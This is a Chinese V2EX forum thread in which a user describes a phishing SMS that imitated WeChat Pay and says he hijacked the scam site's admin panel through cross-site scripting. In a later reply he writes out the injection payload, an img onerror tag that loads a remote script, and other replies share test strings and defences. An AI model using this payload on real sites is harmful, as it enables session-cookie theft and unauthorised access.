V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
TangMonk
V2EX  ›  微信

腾讯内部是不是有内鬼啊,刚刚申请了微信支付,结果就发来诈骗短信

  •  4
     
  •   TangMonk · 2016-12-20 13:54:12 +08:00 · 17516 次点击
    这是一个创建于 2896 天前的主题,其中的信息可能已经有所发展或是发生改变。

    昨天在微信官网上申请微信支付,今天下午就收到了一条短信

    于是我就点开了这个链接,发现是 asp 后缀的,腾讯应该搞 php 的啊,我于是就发现有点不对头,我就往里面来了一发 xss 代码。

    不一会儿就搞到了 cookie, 登录后台一看。。

    第 1 条附言  ·  2016-12-21 09:38:42 +08:00
    各位,应该是伪基站发送的,我查了下移动的短信详单, 没有 95017 的电话号码:

    移动的短信详单:



    我的手机收到的短信:
    (我的手机还"智能"的给短信加了 logo )
    106 条回复    2016-12-22 21:48:21 +08:00
    1  2  
    Showfom
        1
    Showfom  
       2016-12-20 13:56:44 +08:00 via iPhone
    只能说有些人太好骗了
    SourceMan
        2
    SourceMan  
       2016-12-20 13:57:22 +08:00
    火钳刘明
    这个是大新闻
    kimwang
        3
    kimwang  
       2016-12-20 14:00:31 +08:00
    "放蛇“(钓鱼执法) ……
    TangMonk
        4
    TangMonk  
    OP
       2016-12-20 14:00:34 +08:00   ❤️ 102
    我现在已经把上面被盗的信息全部给他删完了。。
    icodesign
        5
    icodesign  
       2016-12-20 14:01:17 +08:00
    取款密码......
    HGladIator
        6
    HGladIator  
       2016-12-20 14:02:47 +08:00 via iPhone
    第一眼就看到了域名错误。
    TangMonk
        7
    TangMonk  
    OP
       2016-12-20 14:04:34 +08:00
    查了下 whois ,貌似是在上海祥和路,电话: 0215822656 , qq: 395849573958
    HFX3389
        8
    HFX3389  
       2016-12-20 14:05:37 +08:00
    我只说两个字,求教。
    HFX3389
        9
    HFX3389  
       2016-12-20 14:06:11 +08:00
    @TangMonk 这是蛇皮 QQ 。现在的新 QQ 都这么长了啊。。。。
    sorcerer
        10
    sorcerer  
       2016-12-20 14:08:57 +08:00 via iPhone
    😂他在哪个页面中了你的 xss
    mrjoel
        11
    mrjoel  
       2016-12-20 14:15:11 +08:00
    所以说啊,还是老老实实用 PHP
    TangMonk
        12
    TangMonk  
    OP
       2016-12-20 14:16:20 +08:00
    @sorcerer 输入手机号的页面啊。。。
    lyragosa
        13
    lyragosa  
       2016-12-20 14:16:38 +08:00
    转型 php 最好语言贴……
    815lbh
        14
    815lbh  
       2016-12-20 14:28:35 +08:00
    大哥,受我一拜,好人啊。(。・∀・)ノ゙
    TangMonk
        15
    TangMonk  
    OP
       2016-12-20 14:29:25 +08:00
    hlg002
        16
    hlg002  
       2016-12-20 14:36:08 +08:00
    求教程
    wenymedia
        17
    wenymedia  
       2016-12-20 14:40:54 +08:00 via Android
    楼主干的漂亮
    感觉把对方服务器肉鸡了
    或者重定向到某榴… 更刺鸡
    TangMonk
        18
    TangMonk  
    OP
       2016-12-20 14:41:31 +08:00
    @hlg002 https://www.google.com/search?q=xss+%E6%95%99%E7%A8%8B&{google:acceptedSuggestion}oq=xss+%E6%95%99%E7%A8%8B&aqs=chrome..69i57.2076j0j7&sourceid=chrome&ie=UTF-8
    hnnxn
        19
    hnnxn  
       2016-12-20 14:44:16 +08:00 via Android
    楼主好人
    x86
        20
    x86  
       2016-12-20 14:47:22 +08:00   ❤️ 1
    php 我学还不行吗
    hlg002
        21
    hlg002  
       2016-12-20 14:48:03 +08:00
    @TangMonk 我在 inpuit 输入 <script>alert(123);</script> 和 get 都不行
    zhang1215
        22
    zhang1215  
       2016-12-20 14:51:00 +08:00
    楼主 666 ,再低劣的骗术也有人中招
    phieo
        23
    phieo  
       2016-12-20 14:53:51 +08:00
    顶楼主 现在社会需要你这样正直的人
    baiyi
        24
    baiyi  
       2016-12-20 14:54:00 +08:00
    @hlg002 你输入了以后就提交上去了,如过真的有漏洞,就是在他的管理页面会弹出`123`了
    TangMonk
        25
    TangMonk  
    OP
       2016-12-20 14:54:12 +08:00
    @hlg002 那可能是对 script 标签过滤了吧
    KenGe
        26
    KenGe  
       2016-12-20 15:00:57 +08:00
    你用了 wifi 没还是用的自己的网络?
    asdwddd
        27
    asdwddd  
       2016-12-20 15:01:55 +08:00
    大家跟进看什么原因
    TangMonk
        28
    TangMonk  
    OP
       2016-12-20 15:02:29 +08:00
    @KenGe 用的 wifi, 怎么了?
    KenGe
        29
    KenGe  
       2016-12-20 15:06:26 +08:00
    @TangMonk 自己检查下吧~ 先别下定义
    CerealKiller
        30
    CerealKiller  
       2016-12-20 15:09:40 +08:00 via iPhone
    看网址 应该能看出不对头……学习了
    Felldeadbird
        31
    Felldeadbird  
       2016-12-20 15:14:40 +08:00
    哈哈,骗子反被楼主骗了。
    骗子:哼哼哼,骗子!
    jiangzhuo
        32
    jiangzhuo  
       2016-12-20 15:23:14 +08:00
    95017 确实是腾讯的客服电话吧。城里套路真是深啊
    marsLeo
        33
    marsLeo  
       2016-12-20 15:33:08 +08:00
    如果你在收到短信前,有短时间手机突然没信号,那有可能是伪基站发的短信。
    jacy
        34
    jacy  
       2016-12-20 16:05:41 +08:00
    数据库挂了还是本来就会错误
    mgna17
        35
    mgna17  
       2016-12-20 16:08:01 +08:00 via iPhone
    Microsoft JET Database Engine 错误 '80004005'

    未指定的错误

    /include/db_conn.asp ,行 36




    他的数据库被人玩坏了。。。
    tumbzzc
        36
    tumbzzc  
       2016-12-20 16:13:44 +08:00
    @TangMonk good job
    subpo
        37
    subpo  
       2016-12-20 16:16:50 +08:00
    问题是...95017 确实是微信的客服号码,这个怎么弄的?
    itqls
        38
    itqls  
       2016-12-20 16:32:42 +08:00
    @subpo 基站伪装呀....以前电信诈骗的时候,各种短信都是银行的号
    wenymedia
        39
    wenymedia  
       2016-12-20 16:50:48 +08:00 via Android
    @mgna17 随手注入 健康你我他…
    xdeng
        40
    xdeng  
       2016-12-20 17:15:00 +08:00
    @itqls 哪有这么巧? 知道了住址,还要连夜赶过去?
    smallaccount
        41
    smallaccount  
       2016-12-20 17:21:24 +08:00
    楼主做了一件大好事。
    WhyAreYouSoSad
        42
    WhyAreYouSoSad  
       2016-12-20 17:25:14 +08:00   ❤️ 3
    马云:祝各位阿 sir 在警察部一帆风顺。干杯!
    hack
        43
    hack  
       2016-12-20 17:49:05 +08:00 via Android
    太暴力,后台登录挂个网马撸出来照片或者视频最好
    hahiru
        44
    hahiru  
       2016-12-20 17:49:53 +08:00 via Android
    伪基站的话应该是撒网捞鱼的。碰巧遇到楼主,腾讯背了锅。
    xdeng
        45
    xdeng  
       2016-12-20 17:52:10 +08:00
    @hahiru 那还不如撒 银行的网
    xdeng
        46
    xdeng  
       2016-12-20 17:52:37 +08:00
    @hahiru 科技园区 有可能
    f1r1ng
        47
    f1r1ng  
       2016-12-20 18:01:27 +08:00
    是不是手机里软件有问题。。
    dreamwar
        48
    dreamwar  
       2016-12-20 18:08:38 +08:00
    基站伪装
    mringg
        49
    mringg  
       2016-12-20 18:16:52 +08:00 via iPhone
    这个重点不是内鬼麼
    dahvlh
        50
    dahvlh  
       2016-12-20 18:19:59 +08:00
    = =,伪基站 去科技园撒网 专门调微信开发者... 这不太现实吧 而且注册也就一次的事情

    得到微信内部查查是谁卖的了
    basefas
        51
    basefas  
       2016-12-20 18:29:38 +08:00 via iPhone
    没有人吐槽“登陆”的么(滑稽)
    wph95
        52
    wph95  
       2016-12-20 18:36:26 +08:00
    @dahvlh
    感觉更不现实的是
    知道你刚 申请微信支付 ,拿到你的 地址,跑到你身边架一个伪基站,恰好你又能收到
    nfroot
        53
    nfroot  
       2016-12-20 18:39:51 +08:00
    @basefas 这货跟我一样,登陆和登录拼音输入法打出哪个用哪个……而且后台没过滤 XSS (我也是填表的时候做过滤……) 看来后台做个防止载入其他站点资源的那个功能是完全有必要的,我以前也想到说如果别人 XSS 我后台……后台地址藏好了也随时暴露……
    nfroot
        54
    nfroot  
       2016-12-20 18:40:38 +08:00
    @wenymedia 1024 的这个好,帮我刷点贡献吧……
    ahkxhyl
        55
    ahkxhyl  
       2016-12-20 18:44:19 +08:00
    我去 贴主~很屌 知道放 xss~~ 不仔细看 真的以为是腾讯发来的~~
    wenymedia
        56
    wenymedia  
       2016-12-20 18:47:10 +08:00 via Android
    @nfroot 嘘 不要走漏了风声
    zhouyg
        57
    zhouyg  
       2016-12-20 18:53:48 +08:00
    牛掰,果然 php 才是王道。
    TangMonk
        58
    TangMonk  
    OP
       2016-12-20 19:06:17 +08:00 via Android
    @zhouyg 我要来推广下 ruby , 哈哈
    Patrick95
        59
    Patrick95  
       2016-12-20 19:07:03 +08:00
    应该是伪基站群发了短信,恰好赶上你微信支付了。
    TimePPT
        60
    TimePPT  
       2016-12-20 19:10:56 +08:00 via iPhone
    围观
    TangMonk
        61
    TangMonk  
    OP
       2016-12-20 19:14:05 +08:00 via Android
    @Patrick95 但是我周围的朋友没有收到短信
    NaturalColour
        62
    NaturalColour  
       2016-12-20 19:31:29 +08:00
    厉害了我的楼主
    Quaintjade
        63
    Quaintjade  
       2016-12-20 19:51:29 +08:00 via Android
    可以查一下详单来分辨是不是伪基站,注意短彩信和增值业务都要查,因为有些增值业务也能发短信。
    cwz326237076
        64
    cwz326237076  
       2016-12-20 19:52:02 +08:00 via Android
    wap.weixtqq.com 这不摆明说是假的么
    ahkxhyl
        65
    ahkxhyl  
       2016-12-20 19:59:38 +08:00
    层主说的对 感觉有点像伪基站发的~~
    j8sec
        66
    j8sec  
       2016-12-20 20:27:26 +08:00   ❤️ 1
    腾讯企业验证费用和验证是交给第三方做的, 这个第三方有重大嫌疑
    TangMonk
        67
    TangMonk  
    OP
       2016-12-20 20:33:42 +08:00
    @j8sec 原来如此!什么公司啊?
    terence4444
        68
    terence4444  
       2016-12-20 20:34:10 +08:00 via iPhone
    过两天去查详单 看看到底是不是伪基站
    wclebb
        69
    wclebb  
       2016-12-20 20:37:36 +08:00 via iPhone
    申请微信支付有可能不是腾讯,而是第三方审核所在的公司。
    Tink
        70
    Tink  
       2016-12-20 20:43:14 +08:00
    强,无敌!
    shingoxray
        71
    shingoxray  
       2016-12-20 20:48:28 +08:00
    Good job !事关广大人民群众安全,建议向当地公安报案,并向腾讯安全应急响应中心报告。
    RobertYang
        72
    RobertYang  
       2016-12-20 21:58:44 +08:00 via Android
    哈哈哈 干的漂亮
    Aidea
        73
    Aidea  
       2016-12-20 22:58:12 +08:00
    厉害,自己还是要加强学习啊~
    gotonba
        74
    gotonba  
       2016-12-20 23:53:53 +08:00
    难怪现在可以通过对公账户打款来验证,看来第三方确实不安全,还得交 300 大洋=。=
    jedihy
        75
    jedihy  
       2016-12-20 23:55:14 +08:00 via iPhone
    能不能写写入侵流程
    jookr
        76
    jookr  
       2016-12-21 00:52:36 +08:00
    [建议]
    1 、用个插件自定义你的 UA (例如插入几个字符),大家写后台的时候在统一入口验证 UA 如果不包含那几个字符就 404 ,这样能防止 XSS 。 https://ext.se.360.cn/webstore/search/魔变
    2 、 session 保存登录的 ip ,每个后台页面打开都判断当前 IP 是否等于登录时记得那个 IP 。

    求还有什么方法或者更简便的方法防止被 XSS
    onionnews
        77
    onionnews  
       2016-12-21 08:49:41 +08:00 via Android
    如果是伪基站的话,怎么知道谁刚刚开通微信支付,刚好受害者周围部署了伪基站?
    lxrmido
        78
    lxrmido  
       2016-12-21 08:55:55 +08:00
    说起伪基站,大学时有一阵子只要发查询剩余流量的短信(移动卡)就会收到电信上网卡的推销短信……
    lxlgod
        79
    lxlgod  
       2016-12-21 09:19:22 +08:00
    @TangMonk 厉害的。。。
    TangMonk
        80
    TangMonk  
    OP
       2016-12-21 09:34:45 +08:00
    楼上的各位,应该是伪基站发送的,我查了下移动的短信详单, 没有 95017 的电话号码:

    移动的短信详单:

    我的手机收到的短信: (我的手机还"智能"的给短信加了 logo )
    Ouyangan
        81
    Ouyangan  
       2016-12-21 09:36:19 +08:00
    @jookr 对输入的字符中的特殊字符进行转义 . 配置统一的过滤层 .
    sola97
        82
    sola97  
       2016-12-21 09:44:32 +08:00
    有没有 xss 代码供学习一下
    tairan2006
        83
    tairan2006  
       2016-12-21 10:10:55 +08:00
    楼主好样的,佩服
    hoythan
        84
    hoythan  
       2016-12-21 10:17:16 +08:00
    能不能提供一下你的 xss 代码学习一下.
    mazyi
        85
    mazyi  
       2016-12-21 10:25:30 +08:00
    厉害啊厉害,随手注入了一下~
    TangMonk
        86
    TangMonk  
    OP
       2016-12-21 10:27:00 +08:00   ❤️ 1
    TangMonk
        87
    TangMonk  
    OP
       2016-12-21 10:32:24 +08:00
    @TangMonk 这个 xss 代码也是我抄别人的。。 :(
    BakCshi
        88
    BakCshi  
       2016-12-21 10:32:25 +08:00
    去知乎发个帖,搞个大新闻
    nevermlnd
        89
    nevermlnd  
       2016-12-21 10:36:57 +08:00
    如果是 iPhone 的截图 回更有说服力
    ljcarsenal
        90
    ljcarsenal  
       2016-12-21 11:17:29 +08:00
    @TangMonk 你这个代码直接通过用户名输入框输入进去的? 服务端和网页限制一下输入长度是不是就没用了
    TangMonk
        91
    TangMonk  
    OP
       2016-12-21 11:28:39 +08:00
    @ljcarsenal 不是,这只是一个 js 链接包含的内容而已,输入框里面填写

    <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的 js 地址';>
    wavingclear
        92
    wavingclear  
       2016-12-21 12:15:57 +08:00 via iPad
    应该是伪基站,想骗普通吃瓜群众,骗到程序员是因为他倒霉
    sutking
        93
    sutking  
       2016-12-21 12:21:36 +08:00 via iPhone
    第一眼就发现域名有问题啊
    sutking
        94
    sutking  
       2016-12-21 12:24:05 +08:00 via iPhone
    你看这 whois ,绝对坑你没商量
    yamen
        95
    yamen  
       2016-12-21 13:12:01 +08:00
    我不懂,但我觉得你用的是安卓吧?
    fengjianxinghun
        96
    fengjianxinghun  
       2016-12-21 13:15:28 +08:00
    nice !干得不错
    choury
        97
    choury  
       2016-12-21 13:22:45 +08:00
    这个是针对个人的微信支付来诈骗的吧,任何人收到都可能受骗啊,基本有微信的都开了微信支付吧,只是你收到短信的时间比较巧吧
    zhangsimon
        98
    zhangsimon  
       2016-12-21 13:37:33 +08:00
    你的手机什么 rom !!! 太干扰人了
    TangMonk
        99
    TangMonk  
    OP
       2016-12-21 13:42:23 +08:00
    @zhangsimon 一加 2 。。氢 os
    samtoto
        100
    samtoto  
       2016-12-21 13:50:12 +08:00
    next page>
    1  2  
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1378 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 29ms · UTC 17:21 · PVG 01:21 · LAX 09:21 · JFK 12:21
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.